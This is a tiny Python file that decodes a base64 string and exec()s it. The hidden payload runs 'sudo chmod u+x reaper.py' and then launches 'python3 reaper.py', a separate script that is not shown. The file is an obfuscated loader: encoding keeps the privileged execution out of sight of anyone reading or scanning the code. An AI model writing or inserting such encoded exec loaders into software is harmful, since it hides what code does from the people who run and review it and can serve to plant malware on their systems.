import base64

script = ("IyEvdXNyL2Jpbi9weXRob24zCgppbXBvcnQgb3MKCmNtZCA9ICdzdWRvIGNobW9kIHUreCByZWFwZXIucHknCm9zLnN5c3RlbShjbWQpCgpjbWQyID0gJ3B5dGhvbjMgcmVhcGVyLnB5Jwpvcy5zeXN0ZW0oY21kMikKCg==")

decodedscript = base64.b64decode(script)

exec(decodedscript)
